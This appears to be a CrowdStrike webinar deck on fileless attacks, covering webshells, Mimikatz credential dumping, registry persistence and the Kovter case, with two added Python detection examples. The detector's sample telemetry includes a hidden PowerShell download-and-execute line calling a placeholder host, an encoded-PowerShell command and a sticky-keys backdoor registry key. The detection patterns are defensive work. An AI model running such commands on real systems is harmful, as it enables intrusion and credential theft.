Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
The document discusses fileless attacks, which are cyber threats that do not rely on malicious executable files being written to disk and are more prevalent than traditional ransomware attacks. It explores how these attacks are conducted, including techniques like spear phishing and the use of legitimate applications for lateral movement, and emphasizes the inadequacy of traditional antivirus solutions against such methods. Key takeaways highlight the need for enhanced defenses beyond conventional malware detection to effectively mitigate breaches.
1.
2017 CROWDSTRIKE, INC.ALL RIGHTS RESERVED.
WHO NEEDS MALWARE?
UNDERSTANDING FILELESS ATTACKS AND HOW TO STOP THEM
2.
1 What are fileless attacks?
2 How does a fileless attack work?
3 Real world examples
4 Why traditional approaches don't work
5 The CrowdStrike approach
3.
POLL QUESTION
HOW WOULD YOU RATE YOUR KNOWLEDGE OF FILELESS ATTACKS, 1 TO 5
(1 = NONE, 5 = EXPERT)
5.
WHAT IS A FILELESS ATTACK
An attack that does not require a malicious executable file to be written to disk
7.
THE REALITY OF FILELESS ATTACKS
Fileless techniques are not new
More prevalent than ransomware: 24% vs. 21%
78% of organizations are concerned about fileless attacks
Only 51% of breaches include malware - Source: Verizon DBIR 2017
Not all attacks are 100% fileless
80% of attacks use some fileless techniques - Source: CrowdStrike Incident Response
FILELESS TECHNIQUES
FILELESS INTRUSION TECHNIQUES OBSERVED BY THE FALCON PLATFORM
§ Spear phishing for credentials
§ Lateral movement using 'living off the land' tools (WMI, Unix commands, PowerShell)
§ Registry persistence
§ Webshells
10.
WEBSHELL ATTACKS
1. Attacker identifies organization with vulnerable web application
2. Remote attacker uses SQL injection or other vulnerability to drop payload
3. Vulnerable webserver is compromised and becomes backdoor
11.
FILELESS TECHNIQUES
FILELESS INTRUSION TECHNIQUES OBSERVED BY THE FALCON PLATFORM
§ Spear phishing for credentials
§ Lateral movement using 'living off the land' tools (WMI, Unix commands, PowerShell)
§ Registry persistence
§ Webshells
§ PowerShell-based credential dumpers
12.
HOW A FILELESS ATTACK TAKES PLACE
1 INITIAL COMPROMISE
Goal: GAIN ACCESS
Technique: Remote access to a system using a web browser. Can be a web scripting language, e.g. China Chopper
Tools: WebShell
2 COMMAND AND CONTROL
Goal: RECON
Technique: Run system commands to find out where we are
Tools: Sysinfo, Whoami
3 PRIVILEGE ESCALATION
Goal: DUMP CREDENTIALS
Technique: Run a PowerShell script such as Mimikatz to dump credentials
Tools: PowerShell
4 PERSISTENCE
Goal: MAINTAIN PERSISTENCE
Technique: Modifies Registry to create a backdoor, e.g. on-screen keyboard or sticky keys
Tools: Registry
5 EXFILTRATION
Goal: EXFILTRATE DATA
Technique: Uses system tools to gather data and China Chopper Webshell to exfiltrate data
Tools: VSSAdmin, Copy, NET use, Webshell
13.
REAL WORLD EXAMPLES
§ Fileless Malware: Kovter
§ Fileless Attack: Nation State
14.
KOVTER
§ Click-fraud
§ Fileless after initial infection
§ Hides encrypted malicious modules in the registry
§ Hides other malicious modules in PowerShell scripts
§ Uses a shortcut file (.lnk) to download PowerShell scripts. The script launches PowerShell to start shellcode
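The chain on slide 12 and the Kovter shortcut launch above leave no malicious file to scan, so the detection has to key on behaviour: which process spawned which, what was on the command line, and which registry values were written. The following is an added example, not CrowdStrike's or Falcon's code, that runs such IOA-style rules over constructed telemetry; the event layout, field names and rule names are assumptions loosely modelled on Sysmon process and registry events.

```python
"""IOA-style behavioural detection over constructed endpoint telemetry.
Added example, not CrowdStrike's or Falcon's code. Flags the slide 12 chain
(webshell-spawned recon, encoded/downloading PowerShell, accessibility-binary
registry backdoor, staging with vssadmin/net) and the Kovter-style .lnk launch
of PowerShell from process lineage, command lines and registry writes only.
Event shape, field names and rule names are assumptions (loosely Sysmon-like)."""
import re

# Constructed sample telemetry (not real incident data).
EVENTS = [
    {"type": "process", "parent": "w3wp.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami & systeminfo"},
    {"type": "process", "parent": "w3wp.exe", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc SQBFAFgA..."},
    {"type": "registry", "image": "reg.exe",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger"},
    {"type": "process", "parent": "cmd.exe", "image": "vssadmin.exe",
     "cmdline": "vssadmin create shadow /for=C:"},
    # Shortcut (.lnk) launch: explorer.exe is the parent, as with Kovter.
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden IEX (New-Object Net.WebClient)"
                ".DownloadString('http://placeholder.invalid/s')"},
    {"type": "process", "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "tomcat.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "whoami.exe", "systeminfo.exe"}
STAGING = {"vssadmin.exe", "net.exe", "xcopy.exe", "robocopy.exe"}
ACCESSIBILITY = ("sethc.exe", "utilman.exe", "osk.exe", "narrator.exe", "magnify.exe")
IFEO_DEBUGGER = re.compile(r"image file execution options\\("
                           + "|".join(map(re.escape, ACCESSIBILITY)) + r")\\debugger$", re.I)
PS_SUSPICIOUS = re.compile(r"(-enc\b|-encodedcommand|downloadstring|\biex\b)", re.I)

def detect(events):
    """Return (rule, actor) pairs; each rule maps to a phase of the slide 12 chain."""
    alerts = []
    for e in events:
        if e["type"] == "registry":  # persistence: IFEO debugger on an accessibility binary
            if IFEO_DEBUGGER.search(e["key"]):
                alerts.append(("accessibility_ifeo_backdoor", e["image"]))
            continue
        parent, image, cmd = e["parent"].lower(), e["image"].lower(), e["cmdline"]
        if parent in WEB_WORKERS and image in SHELLS:  # initial access / recon via webshell
            alerts.append(("webshell_spawned_shell", image))
        if image == "powershell.exe" and PS_SUSPICIOUS.search(cmd):  # loader / credential dumper
            alerts.append(("powershell_encoded_or_download", parent))
        if image in STAGING and parent in {"cmd.exe", "powershell.exe"}:  # exfiltration staging
            alerts.append(("shadow_copy_or_share_staging", image))
    return alerts
```

Running `detect(EVENTS)` yields six alerts, one per phase of the chain plus the shortcut-launched PowerShell, while the benign notepad launch produces none.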
15.
NATION STATE ATTACK
§ Weaponization: Spoofed website
§ Delivery: Spear phishing
§ PowerShell modules connect to a remote server
§ Install/run Mimikatz
§ Lateral movement through stolen credentials
16.
MOVING LATERALLY WITHOUT MALWARE
Attacker sets the bait with a fake website
Extract credentials from initial victim
Move laterally to other hosts
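Once the nation-state chain on slides 15 and 16 reaches the lateral-movement stage, the attacker is using valid credentials and built-in tools, so the observable is the authentication pattern rather than any binary. The following added example (not CrowdStrike's code) checks constructed logon records for one account fanning out to many hosts in a short window and for accounts authenticating from hosts outside their usual set; the record layout, the 10-minute window, the threshold and the baseline are assumptions.

```python
"""Detect credential-based lateral movement from constructed logon records.
Added example, not CrowdStrike's code. The chain on slides 15-16 ends with one
stolen account fanning out to other hosts; with no malware to find, the signal
is the authentication pattern itself. Records loosely follow Windows 4624
network logons; field layout, window, threshold and baseline are assumptions."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample logons: (time, account, source host, destination host).
LOGONS = [
    ("2017-06-01T09:00:00", "svc_backup", "WS-17", "FS-01"),
    ("2017-06-01T09:01:10", "svc_backup", "WS-17", "FS-02"),
    ("2017-06-01T09:02:05", "svc_backup", "WS-17", "DC-01"),
    ("2017-06-01T09:03:40", "svc_backup", "WS-17", "SQL-03"),
    ("2017-06-01T09:04:15", "svc_backup", "WS-17", "HR-02"),
    ("2017-06-01T09:00:30", "alice", "WS-04", "FS-01"),
    ("2017-06-01T11:30:00", "alice", "WS-04", "MAIL-01"),
    ("2017-06-01T14:00:00", "svc_backup", "BKP-01", "FS-01"),
]
# Known source hosts per account, as an operator would build from history (assumed).
BASELINE = {"svc_backup": {"BKP-01"}, "alice": {"WS-04"}}

def fan_out_alerts(logons, window=timedelta(minutes=10), threshold=4):
    """Return (account, source, hosts) whenever one account reaches >= threshold
    distinct destination hosts from one source inside a sliding time window."""
    by_key = defaultdict(list)
    for ts, acct, src, dst in sorted(logons):
        by_key[(acct, src)].append((datetime.fromisoformat(ts), dst))
    alerts = []
    for (acct, src), seq in by_key.items():
        recent = deque()
        for t, dst in seq:
            recent.append((t, dst))
            while recent and t - recent[0][0] > window:  # drop logons older than the window
                recent.popleft()
            hosts = {d for _, d in recent}
            if len(hosts) >= threshold:
                alerts.append((acct, src, tuple(sorted(hosts))))
                recent.clear()  # report each burst once, then keep watching
    return alerts

def unfamiliar_sources(logons, baseline):
    """Return {account: sorted source hosts} for logons from hosts not in the baseline."""
    seen = defaultdict(set)
    for _, acct, src, _ in logons:
        if src not in baseline.get(acct, set()):
            seen[acct].add(src)
    return {a: sorted(s) for a, s in seen.items()}
```

In the sample, `svc_backup` reaches four hosts from workstation WS-17 within four minutes and WS-17 is not one of its usual sources, while `alice` trips neither rule.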
17.
HOW TO PROTECTAGAINST FILELESS
ATTACKS
2017 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
18.
POLL QUESTION
HOW WOULD YOU RATE YOUR CURRENT LEVEL OF PROTECTION AGAINST FILELESS ATTACKS (1 = POOR, 5 = EXCELLENT)
20.
EDUCATE
83% rate traditional AV-based signature efficacy good or excellent
21.
WHY TRADITIONAL APPROACHES DON'T WORK
No file to analyze
No artifacts left behind
Blind if prevention fails
Uses legitimate applications
No file to detonate
Hands on keyboard
22.
FALCON ENDPOINT PROTECTION
BENEFITS
PROTECTS AGAINST ALL TYPES OF ATTACKS
Protect against Known/Unknown Malware/Malware Free
Protect Against Zero-Day Attacks
Endpoint Detection and Response
Managed Threat Hunting
Machine Learning
IOA Behavioral Blocking
Block Known Bad
Exploit Mitigation
KEY TAKEAWAYS
THE THREAT IS REAL
TRADITIONAL AV IS NOT ENOUGH
CURRENT DEFENSES DO NOT WORK
NEED TO THINK BEYOND MALWARE AND FOCUS ON STOPPING THE BREACH
25.
Questions?
Please submit all questions in the Q&A chat right below the presentation slides
Contact Us
Additional Information
Join Weekly Demos: crowdstrike.com/productdemos
Featured Asset: How Adversaries Use Fileless Attacks To Evade Your Security (Link in Resource List)
Website: crowdstrike.com
Email: [email protected]
Number: 1.888.512.8902 (US)